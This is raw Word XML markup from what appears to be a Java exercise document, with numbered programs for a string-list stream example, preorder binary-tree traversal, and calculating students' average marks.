        <w:t>String</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arg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75F6FC6B" w14:textId="3133B5A8" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604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878604"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>//String str = "w1 w2 w2 w3 w3 w4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E7FCC" w14:textId="27CCB511" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604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878604"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> list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Array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asList</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w1"</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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"w2"</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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"w2"</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w3"</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w4"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB97061" w14:textId="734B0824" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604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878604"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> newList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lis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stream</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map</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str </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> str</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toUpperCase</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forEach</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str </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541906B7" w14:textId="20844B69" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604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878604"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>System</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ou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println</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str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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>" "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE8989" w14:textId="5552F6A9" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604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878604"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3525346F" w14:textId="07FA5DBA" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="_Toc196307827"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00D82134" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pre</w:t>
      </w:r>
      <w:r w:rsidR="00624CE2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00D82134" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rder traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
    </w:p>
    <w:p w14:paraId="4D8EC759" w14:textId="77777777" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00A604CB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A604CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program in java to print PreOrder Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F594B68" w14:textId="654F2E7D" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604CB" w:rsidP="00A604CB">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: Given the root of a binary tree, return the preorder traversal of its nodes' values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAEC0C1" w14:textId="0D97B70C" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6A90E3"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p>
    <w:p w14:paraId="6F4517E6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2BEAD"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Tree node definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49D0E3"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reeNod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6DF465F"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val</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B5CF0"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reeNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lef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ight</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69494664"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3B1E570D"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reeNode</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5FE56B5"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xml:space="preserve">        val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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59510E15"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5961B8A"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB43CA"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5754813C"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reOrderTravers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FEEC75E"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6663428E"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eorder Traversal: Root -&gt; Left -&gt; Right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD2086"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preorder</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TreeNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> roo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1D56D79"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roo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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5AF06"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57A83A97"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oo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val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Visit root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCA2A5"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xml:space="preserve">        preord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oo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f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raverse left subtree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A589472"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xml:space="preserve">        preord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oo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igh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raverse right subtree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343A0AD"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477B65B"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0F9BB308"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32FE896"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFAA28D"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3ACFD2"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              / \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443618A"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             2   3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801B217"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            / \   \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0419F6B9"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           4   5   6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731ACCEE"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6634A95D"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0D524C00"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reeNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> roo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reeNod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293A4F1A"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xml:space="preserve">        roo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lef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reeNod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p>
    <w:p w14:paraId="3CF96DA4"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xml:space="preserve">        roo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righ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reeNod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p>
    <w:p w14:paraId="47EFF436"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5B7887F8"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xml:space="preserve">        roo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f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lef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reeNod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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A051275"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xml:space="preserve">        roo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f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righ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reeNod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p>
    <w:p w14:paraId="6FA1D26A"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2E122A64"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xml:space="preserve">        roo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igh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righ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reeNod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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F0F7CD"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7C5F3329"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reorder Traversal: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A94DE"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xml:space="preserve">        preord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oot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416DF4EC" w14:textId="77777777"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9414AFE" w14:textId="57077972" w:rsidR="00D82134" w:rsidRPr="00CE4B95"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098BD7F7" w14:textId="07EBE36B" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="348" w:name="_Toc196307828"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="009D212D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Calculate average marks of Student and return Student object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="348"/>
    </w:p>
    <w:p w14:paraId="54E8E5D6" w14:textId="3F30DE8E" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00EA2925">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="002D669A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to calculate average marks of students and return the student object with average marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C62B0C" w14:textId="16BD546C" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06595AC2"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p>
    <w:p w14:paraId="2CFB7329"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457DA597"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ude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0466674"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D52664"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372E914A"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marks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10888646"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> averageMarks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093DC5B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379805A"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073DC8C0"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uden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mark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84B2F3C"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760078F"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2A0ECEF8"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mark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arks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1526C7A7"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averageMark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alculateAver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rks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6170E"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96F2F34"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4972C3CB"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ethod to calculate average marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE1DC8"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> calculateAverage</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mark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8597618"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mark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ark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Empt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2B145AE6"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s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46EFFDC6"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mark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ark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FE7750F"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s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ark</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82C25F"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C67B584"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doubl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ark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ize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB5E4C"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64D5F2D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41492BD2"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Getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22F566"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getI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B2D2949"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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E95D08D"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46E94F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71552569"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get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A892600"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2A83CDC1"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D793357"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB35C5C"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getMark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4EB0165"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marks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A186EF"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DC279C8"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w:t>
      </w:r>
    </w:p>
